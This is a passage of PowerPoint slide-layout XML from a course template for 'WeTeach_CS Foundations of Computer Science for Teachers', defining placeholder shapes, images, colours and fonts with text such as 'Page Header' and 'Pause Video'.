              <a:off x="672309" y="6243581"/>
              <a:ext cx="488950" cy="43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941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6B5D2E-D716-4FD1-BF54-77EF3EC7115E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9555480" y="0"/>
            <a:ext cx="2646940" cy="6090060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BE5812"/>
          </a:solid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mn-cs"/>
              <a:sym typeface="Avenir Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="291" name="image3.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10807783" y="6462974"/>
            <a:ext cx="987753" cy="116952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{005B63C3-0A88-4FAE-B68B-50FBC9B09274}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1011959" y="1476639"/>
            <a:ext cx="8543521" cy="3837854"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="571500" indent="-571500"/>
            <a:endParaRPr lang="en-US" sz="3200" i="1" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500"/>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F385579-B5D8-4DA5-8EAF-14EE623D67B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3289299" y="739462"/>
            <a:ext cx="4470400" cy="619439"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Page Header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27EE80F2-3C8A-42A1-A369-D873B70F63C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="70728"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="672309" y="6243581"/>
            <a:ext cx="488950" cy="43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hape 157">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4DE823D-E22B-4D98-8D19-B76D5D812CA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9541797" y="3442742"/>
            <a:ext cx="2646940" cy="520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gn="ctr">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:defRPr sz="3000">
                <a:latin typeface="Avenir Black"/>
                <a:ea typeface="Avenir Black"/>
                <a:cs typeface="Avenir Black"/>
                <a:sym typeface="Avenir Black"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Vitesse Bold" pitchFamily="50" charset="0"/>
                <a:sym typeface="Avenir Black"/>
              </a:rPr>
              <a:t>Pause Video</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="image2.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F73ADAEC-B480-40E1-9DCA-72BAC5861EA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix amt="19058"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10433305" y="2171738"/>
            <a:ext cx="930058" cy="930050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCF9CA5D-A956-4EE7-83A0-DF03067288FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7868" y="6090060"/>
            <a:ext cx="12187433" cy="778698"/>
            <a:chOff x="7868" y="6090060"/>
            <a:chExt cx="12187433" cy="778698"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Shape 290">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B517E52-01F7-4E6A-B5C6-9D9779BA4554}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7868" y="6090060"/>
              <a:ext cx="12187433" cy="778698"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BE5812"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:miter lim="400000"/>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sz="1800">
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Vitesse Book" pitchFamily="50" charset="0"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>                                  WeTeach_CS Foundations of Computer Science for Teachers                                                   </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Vitesse Book" pitchFamily="50" charset="0"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>Lesson Main Title – </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Vitesse Book" pitchFamily="50" charset="0"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>edit from slide master</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Vitesse Book" pitchFamily="50" charset="0"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19" name="Picture 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CAA02EB-2C88-455C-8467-5125D96FE5B7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect r="70728"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="672309" y="6243581"/>
              <a:ext cx="488950" cy="43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24310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ideText">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="291" name="image3.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10807783" y="6462974"/>
            <a:ext cx="987753" cy="116952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F385579-B5D8-4DA5-8EAF-14EE623D67B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3289299" y="739462"/>
            <a:ext cx="4470400" cy="619439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Page Header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C46CBC71-EDE8-4B2E-846F-AD4DFAE7ED03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5749637" y="6327666"/>
            <a:ext cx="692726" cy="3683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1pPr>
            <a:lvl2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2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ct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400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Vitesse Book" pitchFamily="50" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Avenir Roman"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Vitesse Book" pitchFamily="50" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Avenir Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72275DFA-F0F1-413A-AE8E-3D378EFA0505}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1011960" y="1476639"/>
            <a:ext cx="4737678" cy="3837854"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="571500" indent="-571500"/>
            <a:endParaRPr lang="en-US" sz="3200" i="1" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500"/>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10EF25F5-C3F8-49C7-BE64-1B8C7913B854}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="70728"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3189477" y="6260024"/>
            <a:ext cx="488950" cy="43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
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8349F26-633C-42BF-B0AF-1ADAAAE1F417}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7198293" y="6337299"/>
            <a:ext cx="692726" cy="3683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1pPr>
            <a:lvl2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2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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venir Roman"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ct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400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Vitesse Book" pitchFamily="50" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Avenir Roman"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Vitesse Book" pitchFamily="50" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Avenir Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B448A9B-442F-4228-B62D-0B6F0118896B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="70728"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="672309" y="6243581"/>
            <a:ext cx="488950" cy="43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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{668513A3-D167-4AA7-977D-E711A76DD07B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7868" y="6090060"/>
            <a:ext cx="12187433" cy="778698"/>
            <a:chOff x="7868" y="6090060"/>
            <a:chExt cx="12187433" cy="778698"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Shape 290">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4982EA2-D338-4884-AF69-1C20F17B11EC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7868" y="6090060"/>
              <a:ext cx="12187433" cy="778698"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BE5812"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:miter lim="400000"/>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sz="1800">
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Vitesse Book" pitchFamily="50" charset="0"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>                                  WeTeach_CS Foundations of Computer Science for Teachers                                                   </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Vitesse Book" pitchFamily="50" charset="0"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>Lesson Main Title – </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Vitesse Book" pitchFamily="50" charset="0"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>edit from slide master</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Vitesse Book" pitchFamily="50" charset="0"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19" name="Picture 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDA4C19E-3878-4809-9AE5-F8AD8534FEC6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect r="70728"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="672309" y="6243581"/>
              <a:ext cx="488950" cy="43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Content Placeholder 1">
            <a:extLst>
